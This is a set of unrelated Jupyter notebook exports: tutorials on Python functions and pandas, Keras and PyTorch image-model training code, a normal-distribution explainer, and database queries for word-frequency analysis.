Section 4 on modularity. ## 2. 
Some Python function workflows ### 2.1 Modules and scripts This approach separates the top-level operations (such as the declaration of exogenous parameter values or analysis of results) from the operations that generate the results. In this approach all declaration of parameter values and final analysis of results is done in a Python script (e.g., `script.py`). The script has no function definitions. It only calls the functions it must use from the module. The module is a Python script (e.g., `module.py`) that does not execute any operations on its own. The module is simply a collection of function definitions that can be imported into other scripts or modules. The following pseudocode is an example of a script. ```python import whateverlibraries as wel import module as mod ... # Declare parameter values and any other stuff ... # Call some functions from module.py val1 = md.func1(val2, val3) val4 = md.func2(val5, val1) ``` The module `module.py` has at least two functions defined in it: `func1` and `func2`. By having these functions imported from the module, they can be differentiated by the `md.` prefix from other functions from other modules or from the script itself that might have the same name. ### 2.2 Scripts with "if __name__ == '__main__':" Suppose you write a module that has in it only functions. You can place the `if __name__ == '__main__':` construct at the end of the module, and every command indented underneath it will execute when the module is run as a script. `'__main__'` is the name of the scope in which top-level code executes. 
```python # This code is part of a module entitled 'module1.py' def simplesum(val1, val2): the_sum = val1 + val2 return the_sum if __name__ == "__main__": # execute only if run as a script myheight = 5.9 mydadsheight = 6.0 tot_height = simplesum(myheight, mydadsheight) ``` You could execute the code that calculates the variable `tot_height` by running `module1.py` as a script (typing `python module1.py` from the terminal or `run module1.py` from ipython). This method is often prefered to having functions and executable script lines in the same function as is described in Section 2.3. The reason is that, in this method using the `if __name__ == '__main__':` construct, all the commands are inside of functions. ### 2.3 Functions and executable commands in script You can declare functions and run executable lines outside of functions in the same script. This is commonly done in small projects, although many developers feel that following the method from Section 2.2 is a better practice. ``` import numpy as np # Declare parameters myheight = 5.9 mydadsheight = 6.0 def simplesum(val1, val2): the_sum = val1 + val2 return the_sum tot_height = simplesum(myheight, mydadsheight) tot_height ``` ## 3. Function documentation Every function should be well documented. The form of exact function docstrings has not yet been fully regularized in the Python community, but some key principles apply. It is ideal to give carefully organized and easily accessible information in your docstrings and in-line comments such that an outside user can quickly understand what your function is doing. Good documentation can save you time in the long-run (but almost certainly not in the short run) by giving a nice roadmap for debugging code later on if a problem arises. Furthermore, you might sometimes forget what you were originally trying to do with a particular piece of code, and the documentation will remind you. 
Lastly, well-documented code is essential for other researchers to be able to collaborate with you. Comments in the code are descriptive lines that are not executed by the interpreter. You can comment code in three ways. Brackets of three double quotes `""" """` or brackets of three single quotes `''' '''` will comment out large blocks of text. The pound sign `#` will comment out a single line of text or a partial line of text. ``` print(3 + 7) # print("You're not the best!") print("You're the best!") ''' In the following code snippet, I will print out what most other people think of me. But I might want to change it by uncommenting and commenting out particular lines. ''' print("You're the best.") # print("You're not the best.") ``` ### 3.1 The function docstring The function docstring is a block of text commented out by three bracketing quotes `''' '''` or `""" """`. Docstrings that immediately follow a function are often brought up as the automatic function help or description in advanced text editors and ipython development environments (IDEs). As such, the docstring is an essential description and roadmap for a function. Below is an example of a function that takes as an input a scalar that represents the number of seconds some procedure took. 
``` def print_time(seconds, type): ''' -------------------------------------------------------------------- Takes a total amount of time in seconds and prints it in terms of more readable units (days, hours, minutes, seconds) -------------------------------------------------------------------- INPUTS: seconds = scalar > 0, total amount of seconds type = string, description of the type of computation OTHER FUNCTIONS AND FILES CALLED BY THIS FUNCTION: OBJECTS CREATED WITHIN FUNCTION: secs = scalar > 0, remainder number of seconds mins = integer >= 1, remainder number of minutes hrs = integer >= 1, remainder number of hours days = integer >= 1, number of days FILES CREATED BY THIS FUNCTION: None RETURNS: Nothing -------------------------------------------------------------------- ''' if seconds < 60: # seconds secs = round(seconds, 4) print(type + ' computation time: ' + str(secs) + ' sec') elif seconds >= 60 and seconds < 3600: # minutes mins = int(seconds / 60) secs = round(((seconds / 60) - mins) * 60, 1) print(type + ' computation time: ' + str(mins) + ' min, ' + str(secs) + ' sec') elif seconds >= 3600 and seconds < 86400: # hours hrs = int(seconds / 3600) mins = int(((seconds / 3600) - hrs) * 60) secs = round(((seconds / 60) - hrs * 60 - mins) * 60, 1) print(type + ' computation time: ' + str(hrs) + ' hrs, ' + str(mins) + ' min, ' + str(secs) + ' sec') elif seconds >= 86400: # days days = int(seconds / 86400) hrs = int(((seconds / 86400) - days) * 24) mins = int(((seconds / 3600) - days * 24 - hrs) * 60) secs = round( ((seconds / 60) - days * 24 * 60 - hrs * 60 - mins) * 60, 1) print(type + ' computation time: ' + str(days) + ' days, ' + str(hrs) + ' hrs, ' + str(mins) + ' min, ' + str(secs) + ' sec') print_time(98765, 'Simulation') ``` Notice the docstring after the definition line of the function. It starts out with a general description of what the function does. 
Then it describes the inputs to the function, any other functions that this function calls, any objects created by this function, any files saved by this function, and the objects that the function returns. In this case, the function does not return any objects. It just prints output to the terminal. You will also notice the in-line comments after each `if` statement. These comments describe what particular sections of the code are doing. ### 3.2 In-line comments You see examples of in-line comments in the `print_time()` function above. In-line comments can be helpful for describing the flow of operations or logic within a function. They act as road signs along the way to a function's completion. ## 4. Function modularity A principle in writing Python code is to make functions for each piece that gets used multiple times. This is where the art of good code writing is evident. Here are some questions that the developer must answer. 1. How many times must an operation be repeated before it merits its own function? 2. How complicated must an operation be to merit its own function? 3. Which groups of operations are best grouped together as functions? ## 5. Lambda functions The keyword `lambda` is a shortcut for creating one-line functions in Python. ``` f = lambda x: 6 * (x ** 3) + 4 * (x ** 2) - x + 3 f(10) g = lambda x, y, z: x + y ** 2 - z ** 3 g(1, 2, 3) ``` ## 6. Generalized function input Sometimes you will want to define a function that has a variable number of input arguments. Python's function syntax includes two variable-length input objects: `*args` and `**kwargs`. `*args` is a tuple of the positional arguments, and `**kwargs` is a dictionary mapping the keywords to their arguments. This is the most general form of a function definition.
``` def report(*args, **kwargs): for i, arg in enumerate(args): print('Argument ' + str(i) + ':', arg) for key in kwargs: print("Keyword", key, "->", kwargs[key]) report("TK", 421, exceptional=False, missing=True) ``` Passing arguments or dictionaries through the variable-length `*args` or `**kwargs` objects is often desirable for the targets of SciPy's root finders, solvers, and minimizers. ## 7. Some function best practices 1. Don't use global variables. Always explicitly pass everything in to a function that the function requires to execute. 2. Don't pass input arguments into a function that do not get used. This principle is helpful when one needs to debug code. 3. Don't create objects in the return line of a function. Even though it is easier and you can often write an entire function in one return line, it is much cleaner and more transparent to create all of your objects in the body of a function and only return objects that have already been created. ## References * [Python labs](http://www.acme.byu.edu/?page_id=2067), Applied and Computational Mathematics Emphasis (ACME), Brigham Young University.
github_jupyter
``` import numpy as np import matplotlib.pyplot as plt from keras.layers import Input, Dense from keras.models import Model from keras.datasets import fashion_mnist (x_train, y_train), (x_test, y_test) = fashion_mnist.load_data() x_train.shape, x_test.shape, type(x_train) plt.imshow(x_train[1], cmap='binary') # Size of encoded representation # 32 floats denotes a compression factor of 24.5 assuming input is 784 float # we have 32*32 or 1024 floats encoding_dim = 32 #Input placeholder input_img = Input(shape=(784,)) #Encoded representation of input image encoded = Dense(encoding_dim, activation='relu', activity_regularizer=regularizers.l1(10e-5))(input_img) # Decode is lossy reconstruction of input decoded = Dense(784, activation='sigmoid')(encoded) # This autoencoder will map input to reconstructed output autoencoder = Model(input_img, decoded) autoencoder.compile(optimizer='adadelta', loss='binary_crossentropy') autoencoder.summary() ''' The seperate encoder network ''' # Define a model which maps input images to the latent space encoder_network = Model(input_img, encoded) # Visualize network encoder_network.summary() ''' The seperate decoder network ''' # Placeholder to recieve the encoded (32-dimensional) representation as input encoded_input = Input(shape=(encoding_dim,)) # Decoder layer, retrieved from the aucoencoder model decoder_layer = autoencoder.layers[-1] # Define the decoder model, mapping the latent space to the output layer decoder_network = Model(encoded_input, decoder_layer(encoded_input)) # Visualize network decoder_network.summary() autoencoder.compile(optimizer='adadelta', loss='binary_crossentropy') # Normalize pixel values x_train = x_train.astype('float32') / 255. x_test = x_test.astype('float32') / 255. 
# Flatten images to 2D arrays x_train = x_train.reshape((len(x_train), np.prod(x_train.shape[1:]))) x_test = x_test.reshape((len(x_test), np.prod(x_test.shape[1:]))) # Print out the shape print(x_train.shape) print(x_test.shape) plt.imshow(x_train[1].reshape(28,28)) autoencoder.fit(x_train, x_train, epochs=50, batch_size=256, shuffle=True, validation_data=(x_test, x_test)) # Time to encode some images encoded_imgs = encoder_network.predict(x_test) # Then decode them decoded_imgs = decoder_network.predict(encoded_imgs) # use Matplotlib (don't ask) import matplotlib.pyplot as plt plt.figure(figsize=(22, 6)) num_imgs = 9 for i in range(n): # display original ax = plt.subplot(2, num_imgs, i + 1) true_img = x_test[i].reshape(28, 28) plt.imshow(true_img) # display reconstruction ax = plt.subplot(2, num_imgs, i + 1 + num_imgs) reconstructed_img = decoded_imgs[i].reshape(28,28) plt.imshow(reconstructed_img) plt.show() ```
github_jupyter
# VGG-16 on CIFAR-10 ### Imports ``` import time import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from torchvision import datasets from torchvision import transforms from torch.utils.data import DataLoader if torch.cuda.is_available(): torch.backends.cudnn.deterministic = True ``` ### Settings and Dataset ``` # Device device = torch.device("cuda" if torch.cuda.is_available() else "cpu") # Hyperparameters random_seed = 1 learning_rate = 0.001 num_epochs = 10 batch_size = 128 torch.manual_seed(random_seed) # Architecture num_features = 784 num_classes = 10 # Data train_dataset = datasets.CIFAR10(root='data', train=True, transform=transforms.ToTensor(), download=True) test_dataset = datasets.CIFAR10(root='data', train=False, transform=transforms.ToTensor()) train_loader = DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True) test_loader = DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=False) # Checking the dataset for images, labels in train_loader: print('Image batch dimensions:', images.shape) print('Image label dimensions:', labels.shape) break ``` ### Model ``` class VGG16(nn.Module): def __init__(self, num_classes): super(VGG16, self).__init__() self.block_1 = nn.Sequential( nn.Conv2d(in_channels=3, out_channels=64, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.Conv2d(in_channels=64, out_channels=64, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2)) ) self.block_2 = nn.Sequential( nn.Conv2d(in_channels=64, out_channels=128, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.Conv2d(in_channels=128, out_channels=128, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2)) ) self.block_3 = nn.Sequential( nn.Conv2d(in_channels=128, out_channels=256, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.Conv2d(in_channels=256, out_channels=256, kernel_size=(3, 
3), stride=(1, 1), padding=1), nn.ReLU(), nn.Conv2d(in_channels=256, out_channels=256, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2)) ) self.block_4 = nn.Sequential( nn.Conv2d(in_channels=256, out_channels=512, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.Conv2d(in_channels=512, out_channels=512, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.Conv2d(in_channels=512, out_channels=512, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2)) ) self.block_5 = nn.Sequential( nn.Conv2d(in_channels=512, out_channels=512, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.Conv2d(in_channels=512, out_channels=512, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.Conv2d(in_channels=512, out_channels=512, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2)) ) self.classifier = nn.Sequential( nn.Linear(512, 4096), nn.ReLU(True), nn.Linear(4096, 4096), nn.ReLU(True), nn.Linear(4096, num_classes) ) for m in self.modules(): if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Linear): nn.init.kaiming_uniform_(m.weight, mode='fan_in', nonlinearity='relu') if m.bias is not None: m.bias.detach().zero_() def forward(self, x): x = self.block_1(x) x = self.block_2(x) x = self.block_3(x) x = self.block_4(x) x = self.block_5(x) x = torch.flatten(x, 1) logits = self.classifier(x) probas = F.softmax(logits, dim=1) return logits, probas model = VGG16(num_classes) model.to(device) optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate) ``` ### Training ``` def compute_accuracy(model, data_loader): model.eval() correct_pred, num_examples = 0, 0 for i, (features, targets) in enumerate(data_loader): features = features.to(device) targets = targets.to(device) logits, probas = model(features) _, predicted_labels = torch.max(probas, 1) num_examples += targets.size(0) 
correct_pred += (predicted_labels == targets).sum() return correct_pred.float()/num_examples * 100 for epoch in range(num_epochs): model.train() for batch_idx, (features, targets) in enumerate(train_loader): features = features.to(device) targets = targets.to(device) # Forward and Backprop logits, probas = model(features) cost = F.cross_entropy(logits, targets) optimizer.zero_grad() cost.backward() # update model paramets optimizer.step() # Logging if not batch_idx % 50: print ('Epoch: %03d/%03d | Batch %04d/%04d | Cost: %.4f' %(epoch+1, num_epochs, batch_idx, len(train_loader), cost)) model.eval() with torch.set_grad_enabled(False): print('Epoch: %03d/%03d | Train: %.3f%% ' %( epoch+1, num_epochs, compute_accuracy(model, train_loader))) ``` ### Evaluation ``` with torch.set_grad_enabled(False): print('Test accuracy: %.2f%%' % (compute_accuracy(model, test_loader))) ```
github_jupyter
``` import tensorflow as tf from tensorflow import keras print( 'Tensorflow : ',tf.__version__) print( ' |-> Keras : ',keras.__version__) ``` # 5.1 - Introduction to convnets This notebook contains the code sample found in Chapter 5, Section 1 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments. ---- First, let's take a practical look at a very simple convnet example. We will use our convnet to classify MNIST digits, a task that you've already been through in Chapter 2, using a densely-connected network (our test accuracy then was 97.8%). Even though our convnet will be very basic, its accuracy will still blow out of the water that of the densely-connected model from Chapter 2. The 6 lines of code below show you what a basic convnet looks like. It's a stack of `Conv2D` and `MaxPooling2D` layers. We'll see in a minute what they do concretely. Importantly, a convnet takes as input tensors of shape `(image_height, image_width, image_channels)` (not including the batch dimension). In our case, we will configure our convnet to process inputs of size `(28, 28, 1)`, which is the format of MNIST images. We do this via passing the argument `input_shape=(28, 28, 1)` to our first layer. ``` from keras import layers from keras import models model = models.Sequential() model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1))) model.add(layers.MaxPooling2D((2, 2))) model.add(layers.Conv2D(64, (3, 3), activation='relu')) model.add(layers.MaxPooling2D((2, 2))) model.add(layers.Conv2D(64, (3, 3), activation='relu')) ``` Let's display the architecture of our convnet so far: ``` model.summary() ``` You can see above that the output of every `Conv2D` and `MaxPooling2D` layer is a 3D tensor of shape `(height, width, channels)`. 
The width and height dimensions tend to shrink as we go deeper in the network. The number of channels is controlled by the first argument passed to the `Conv2D` layers (e.g. 32 or 64). The next step would be to feed our last output tensor (of shape `(3, 3, 64)`) into a densely-connected classifier network like those you are already familiar with: a stack of `Dense` layers. These classifiers process vectors, which are 1D, whereas our current output is a 3D tensor. So first, we will have to flatten our 3D outputs to 1D, and then add a few `Dense` layers on top: ``` model.add(layers.Flatten()) model.add(layers.Dense(64, activation='relu')) model.add(layers.Dense(10, activation='softmax')) ``` We are going to do 10-way classification, so we use a final layer with 10 outputs and a softmax activation. Now here's what our network looks like: ``` model.summary() ``` As you can see, our `(3, 3, 64)` outputs were flattened into vectors of shape `(576,)`, before going through two `Dense` layers. Now, let's train our convnet on the MNIST digits. We will reuse a lot of the code we have already covered in the MNIST example from Chapter 2. 
``` from keras.datasets import mnist from keras.utils import to_categorical (train_images, train_labels), (test_images, test_labels) = mnist.load_data() train_images = train_images.reshape((60000, 28, 28, 1)) train_images = train_images.astype('float32') / 255 test_images = test_images.reshape((10000, 28, 28, 1)) test_images = test_images.astype('float32') / 255 train_labels = to_categorical(train_labels) test_labels = to_categorical(test_labels) model.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy']) model.fit(train_images, train_labels, epochs=5, batch_size=64) ``` Let's evaluate the model on the test data: ``` test_loss, test_acc = model.evaluate(test_images, test_labels) test_acc ``` While our densely-connected network from Chapter 2 had a test accuracy of 97.8%, our basic convnet has a test accuracy of 99.3%: we decreased our error rate by 68% (relative). Not bad!
github_jupyter
# Random Variables and The Normal Distribution #### Definition of a Random Variable A random variable is a number that describes the outcome of an event. We can never be certain what value a random variable will take until after the event happens. #### Examples of Random Variables | Event | Random Variable | |---------------------------------------------------------|-----------------------------------------| | Flipping a coin | 1 if heads, 0 if tails | | Rolling a die | What number will appear face up | | Completion of a thesis | The number of years it takes | | Weight of a dead cat's heart | How much the heart weighs in grams | | Calculating the average weight of 144 dead cats' hearts | How much the average weight is in grams | #### Probability Distribution Functions (PDFs) Although we can never be certain what value random variable can take on, we often know or can guess what's called a <font color='red'>probability distribution function</font> or <font color='red'>PDF</font> for short. PDF's tell you what the probability is that a random variable will take on a certain value. In other words they tell you the probability of an event going down a certain way. If the event you're concerned with is the completion of a thesis and the random variable is number of years it takes, then the PDF could tell you that taking 4.5 years has a probability of 0.4, 5 years has a probability of 0.3, 10 years has a probability of 0.05, etc. If you integrate PDFs over all values that a random variable can take the result will always be one. This makes sense because the sum of the probabilities of all possibilities has to be one i.e. one of the possibilities has to take place Note that continuous random variables like the number of years it takes to complete a thesis have PDFs, but discrete random variables like what number will face up when you roll a die have what's called <font color='red'>probability mass functions</font> or <font color='red'>PMFs</font>. 
This small detail is unimportant to know for this presentation, but is just a heads up for when you go out and read papers. #### The PDF of the Normal Distribution If X is a random variable, and its PDF is the following $$p(\,x\,|\,\mu, \sigma)= \frac{1}{\sqrt{2\pi\sigma^2}}\mathrm{exp}\left\{-\frac{1}{2}\left(\frac{x-\mu}{\sigma}\right)^2\right\}$$ then we say X is <font color='red'>normally distributed</font> or X follows the normal distribution. This means we can get the probability that X will take on certain values since it is normally distributed. To find the probability that X will equal 3.23 we simply plug in 3.23 for x in the above equation. There are many other distributions, in fact infinite, but the normal distribution is a famous one because many random variables we encounter out in the wild seem normally distributed. I mentioned that we can get the probability that X will equal 3.23 or any number for that matter, just from the above PDF, but we also need to know what $\mu$ and $\sigma$ above are to get that probability. $\mu$ and $\sigma$ are called the <font color='red'>parameters</font> of the normal distribution. The PDF depends on what values they take on. $\mu$ is called the <font color='red'>mean</font> of the normal distribution and $\sigma$ is called the <font color='red'>standard deviation</font> of the normal distribution. Below is the normal distribution plotted with several different parameters. <img src="Normal_Distribution_PDF.svg"> #### Mean or Expected Value Pretend that there are many, many alternate universes, and in each of these universes X takes on a different value. If we averaged the value that X took in all these universes the resulting number is called the <font color='red'>mean</font> or <font color='red'>expected value</font> of X. Every random variable has an expected value. Using the PDF you can calculate the expected value. For the normal distribution the expected value will always be $\mu$. 
#### Modes of Random Variables If we look at what value X took on the most times in all those alternate universes, the resulting value would be called the <font color='red'>mode</font> of the random variable X. Every random variable has a mode, and it is simply the value at which the PDF attains its maximum. This makes sense because the mode is the number that X will take on most often and thus with highest probability. For normal random variables, the mode happens to always be $\mu$. #### Standard Deviation or Variance of Random Variables Now say we have the expected value of a random variable. We can take the value X took on in all those alternate universes and find the squared distance from the mean. We do this by subtracting the mean from the value and squaring it. If we then took all these squared distances from the mean that X was in all these alternate universes and we average these squared distances then the result is called the <font color='red'>variance</font> of the random variable. The variance of a random variable tells you, on average, how far (in squared distance) a random variable will fall from its mean. The square root of the variance is called the <font color='red'>standard deviation</font>. For the normal distribution, the standard deviation is $\sigma$.
github_jupyter
``` %load_ext autoreload %autoreload 2 import logging logging.basicConfig(format="%(asctime)s [%(process)d] %(levelname)-8s " "%(name)s,%(lineno)s\t%(message)s") logging.getLogger().setLevel('DEBUG') %matplotlib inline import numpy as np import pandas as pd import matplotlib.pyplot as plt from tqdm import tqdm_notebook as tqdm # Read information to connect to the database and put it in environment variables import os with open('ENVVARS.txt') as f: for line in f: parts = line.split('=') if len(parts) == 2: os.environ[parts[0]] = parts[1].strip() db_name = 'ticclat' #db_name = 'ticclat_test' os.environ['dbname'] = db_name from ticclat.ticclat_schema import corpusId_x_documentId, TextAttestation, Lexicon, Wordform, Anahash, Document, Corpus, WordformLink, WordformLinkSource, lexical_source_wordform from ticclat.dbutils import get_session, session_scope Session = get_session(os.environ['user'], os.environ['password'], os.environ['dbname']) from ticclat.queries import wfs_min_num_lexica with session_scope(Session) as session: r = wfs_min_num_lexica(session) for row in r: print(row) from ticclat.queries import count_unique_wfs_in_corpus with session_scope(Session) as session: r = count_unique_wfs_in_corpus(session, corpus_name='SoNaR-500') print(r.fetchall()) from ticclat.queries import wordform_in_corpus_over_time def wf_frequencies(session, wf, corpus_name): r = wordform_in_corpus_over_time(session, wf=word, corpus_name=corpus_name) records = [row for row in r.fetchall()] df = pd.DataFrame.from_records(records, columns=['wordform_id', 'wordform', 'pub_year', 'document_frequency', 'term_frequency']) df.sort_values(by=['pub_year'], inplace=True) df['term_frequency'] = df['term_frequency'].astype(int) return df word = 'regeering' corpus_name='Staten Generaal Digitaal' with session_scope(Session) as session: df = wf_frequencies(session, word, corpus_name) df.plot(x='pub_year', y=['term_frequency', 'document_frequency'], figsize=(10,5), grid=True, title=f'\"{word}\" in 
{corpus_name}') word = 'regering' corpus_name='Staten Generaal Digitaal' with session_scope(Session) as session: df2 = wf_frequencies(session, word, corpus_name) df2.plot(x='pub_year', y=['term_frequency', 'document_frequency'], figsize=(10,5), grid=True, title=f'\"{word}\" in {corpus_name}') from ticclat.queries import wordform_in_corpora word = 'regering' corpus_name='Staten Generaal Digitaal' with session_scope(Session) as session: r = wordform_in_corpora(session, wf=word) records = [row for row in r] df = pd.DataFrame.from_records(records, columns=['wordform_id', 'wordform', 'pub_year', 'document_frequency', 'term_frequency']) df.sort_values(by=['pub_year'], inplace=True) df['term_frequency'] = df['term_frequency'].astype(int) df.plot(x='pub_year', y=['term_frequency', 'document_frequency'], figsize=(10,5), grid=True, title=f'\"{word}\" in {corpus_name}') records = [row for row in r] df = pd.DataFrame.from_records(records) df df from sqlalchemy import select, text from sqlalchemy.sql import func, distinct, and_, desc def wordform_in_corpora_over_time(session, wf): """Given a wordform, and a corpus, return word frequencies over time. Gives both the term frequency and document frequency. 
""" q = select([Corpus.name, Document.pub_year, func.count(Document.document_id).label('document_frequency'), func.sum(TextAttestation.frequency).label('term_frequency'), func.sum(Document.word_count).label('num_words')]) \ .select_from(Corpus.__table__.join(corpusId_x_documentId, Corpus.corpus_id == corpusId_x_documentId.c.corpus_id) .join(Document, Document.document_id == corpusId_x_documentId.c.document_id) .join(TextAttestation).join(Wordform)) \ .where(Wordform.wordform == wf) \ .group_by(Corpus.name, Document.pub_year, Wordform.wordform, Wordform.wordform_id) print(f'Executing query:\n{q}') return pd.read_sql(q, session.connection()) with session_scope(Session) as session: r = wordform_in_corpora_over_time(session, wf='regering') r r['normalized_term_frequency'] = r['term_frequency'] / r['num_words'] * 100.0 r import holoviews as hv from IPython.display import HTML hv.notebook_extension() data = hv.Dataset(hv.Table(r[['name', 'pub_year', 'normalized_term_frequency']]), ['name', 'pub_year'], ['normalized_term_frequency']) print(data) data.to(hv.Curve, 'pub_year', 'normalized_term_frequency') ndoverlay = data.select().to(hv.Curve, 'pub_year', 'normalized_term_frequency').overlay('name') ndoverlay ```
github_jupyter
# Table of Contents - **Series** - **DataFrame** - Accessing a DataFrame - Boolean Indexing - Adding columns - Deleting columns - Importing Excel files as DataFrames - Missing Data - Writing and reading CSV files - **DataFrame Operations** - Matrix operations - Column operations - **Data Merging** - Concatenation - Joining - Merging - **Data Splitting** - Grouping - Unstacking **Pandas** is desgined to make **data pre-processing and data analysis fast and easy in Python**. Pandas adopts many coding idioms from NumPy, such as avoiding the `for` loops, but it is designed for working with heterogenous data represented in tabular format. To use Pandas, you need to import the `pandas` module, using for example: ``` import pandas as pd import numpy as np # we will also need numpy ``` This import style is quite standard; all objects and functions the `pandas` package will now be invoked with the `pd.` prefix. Pandas has two main data structures, **Series** and **DataFrame**. # Series Series are the Pandas version of 1-D Numpy arrays. An instance of Series is a single dimension array-like object containing: - a *sequence of values*, - an array of *data labels*, called its **index**. A Series can be created easily from a Python list: ``` ts = pd.Series([4, 8, 1, 3]) print(ts) ``` The underlying structure can be recovered with the `values` attribute: ``` print(ts.values) ``` The string representation of a Series display two columns: the first column represents the index array, the second column represents the values array. Since no index was specified, the default indexing consists of increasing integers starting from 0. 
To create a Series with its own index, you can write: ``` ts = pd.Series([4, 8, 1, 3], index=['first', 'second', 'third', 'fourth']) print(ts) ``` The labels in the index can be used to select values in the Series (note the list in the second line): ``` print(ts['first']) print(ts[['second', 'fourth']]) ``` Using NumPy functions or NumPy-like operations, such as boolean indexing, universal functions, and so on, will preserve the indexes: ``` print(ts[ts > 3]) print(np.exp(ts)) ``` You can think about a Series as a kind of fixed-length, ordered Python's `dict`, mapping index values to data values. In fact, it is possible to create a Series directlty from a Python's `dict`: ``` my_dict = {'Pisa': 80, 'London': 300, 'Paris': 1} ts = pd.Series(my_dict) print(ts) ``` Arithmetic operations on Series are automatically aligned on the index labels: ``` ts1 = pd.Series([4, 8, 1, 3], index=['first', 'second', 'third', 'fourth']) ts2 = pd.Series([4, 8, 1], index=['first', 'second', 'pisa']) ts1 ts2 ts_sum = ts1 + ts2 print(ts_sum) ``` Here two index values are correctly computed (corresponding to the label `first` and `second`). The two other index labels `third` and `fourth` in `ts1` are missing in `ts2`, as well as the `pisa` index label in `ts2`. Hence, for each of these index label, a `NaN` value (*not a number*) appears, which Pandas considers as a **missing value**. The `pd.isnull` and `pd.notnull` functions detects missing data, as well as the corresponding instance methods: ``` print(pd.isnull(ts_sum)) print(ts_sum.notnull()) ``` Both Series and its index have a `name` attribute: ``` ts_sum.name = 'sum' ts_sum.index.name = 'new name' print(ts_sum) ``` # DataFrame A DataFrame is a rectangular table of data. It contains an ordered list of columns. Every column can be of a different type. A DataFrame has both a *row index* and a *column index*. It can be thought as a dict of Series (one per column) all sharing the same index labels. 
There are many ways to construct a DataFrame, but the most common is using a dictionary of Python's lists (or NumPy's arrays): ``` cars = {'Brand': ['Honda Civic', 'Toyota Corolla', 'Ford Focus', 'Audi A4'], 'Price': [22000, 25000, 27000, 35000], 'Wheels': 4} # broadcast if possible df = pd.DataFrame(cars) print(df) ``` The resulting DataFrame will receive its index automatically as with Series. To pretty-print a DataFrame in a Jupyter notebook, it is enough to write its name (or using the `head()` instance method for very long DataFrames): ``` df df.head(2) df.tail(2) ``` A summary of the *numerical* data is provided by `describe`: ``` df.describe() ``` It is possible to change the order of the columns at DataFrame construction time. If you provide a column's name not included in the dictionary, a column with missing values will appear: ``` df = pd.DataFrame(cars, columns=['Color', 'Price', 'Brand', 'Wheels']) print(df) ``` If working with a large table, it might be useful to sometimes have a list of all the columns' names. 
This is given by the `keys()` methods: ``` print(df.keys()) print(df.columns) ``` Many feature from the NumPy package can be directly used with Pandas DataFrames ``` print(df.values) print(df.shape) ``` Another common way to create a DataFrame is to use a *nested dict of dicts*: ``` pop = {'Nevada': {2001: 2.4, 2002: 2.9}, 'Ohio': {2000: 1.5, 2001: 1.7, 2002: 3.6}} ``` If this nested dict is passed to the DataFrame, the outer dict keys are interpreted as column labels, and the inner keys are interpreted as row labels: ``` df = pd.DataFrame(pop) df ``` ## Accessing a DataFrame Let's create a brand new DataFrame: ``` dict_of_list = {'birth': [1860, 1770, 1858, 1906], 'death':[1911, 1827, 1924, 1975], 'city':['Kaliste', 'Bonn', 'Lucques', 'Saint-Petersburg']} composers_df = pd.DataFrame(dict_of_list, index=['Mahler', 'Beethoven', 'Puccini', 'Shostakovich']) composers_df ``` There are multiple ways of accessing values or series of values in a Dataframe. Unlike in Series, a simple bracket gives access to a column and not an index, for example: ``` composers_df['city'] ``` returns a Series. Alternatively one can also use the attributes syntax and access columns by using: ``` composers_df.city ``` The attributes syntax has some limitations, so in case something does not work as expected, revert to the brackets notation. When specifiying multiple columns, a DataFrame is returned: ``` composers_df[['city', 'birth']] ``` from the [docs](https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html): >The Python and NumPy indexing operators [$\cdot$] and attribute operator `.` provide quick and easy access to pandas data structures across a wide range of use cases. This makes interactive work intuitive, as there’s little new to learn if you already know how to deal with Python dictionaries and NumPy arrays. However, since the type of the data to be accessed isn’t known in advance, directly using standard operators has some optimization limits. 
For production code, we recommended that you take advantage of the optimized pandas data access methods exposed in this chapter. Standard indexing operators (just slices the rows) ``` composers_df[0:2] ``` Pandas optimized data access methods: `iloc` and `loc`. **Remember that `loc` and `iloc` are attributes, not methods, hence they use brackets `[]` and not parenthesis `()`.** The `loc` attribute allows to recover elements by using the index labels, while the `iloc` attribute can be used to recover the regular indexing: ``` print(composers_df.iloc[0:2,:]) print() print(composers_df.loc[['Mahler','Beethoven'], 'death']) print() print(composers_df.loc['Beethoven', 'death']) ``` ## Boolean Indexing Just like with Numpy, it is possible to subselect parts of a Dataframe using boolean indexing. A logical Series can be used as an index to select elements in the Dataframe. ``` composers_df mask = composers_df['death'] > 1859 print(mask) composers_df[mask] ``` More compact: ``` composers_df[composers_df['birth'] > 1900] ``` Using `isin`: ``` composers_df[composers_df['birth'].isin([1906,1858])] ``` ## Adding columns It is very simple to add a column to a Dataframe: ``` composers_df['country'] = '???' composers_df ``` Alternatively, an existing list can be used: ``` composers_df['country2'] = ['Austria','Germany','Italy','Russia'] composers_df ``` ## Deleting columns The `del`keyword is used to delete columns: ``` del composers_df['country'] composers_df ``` ## Importing Excel files as DataFrames Another very common way of "creating" a Pandas Dataframe is by importing a table from another format like CSV or Excel. You may need to install `xlrd` package: ```shell > pip install xlrd ``` ``` # !pip install 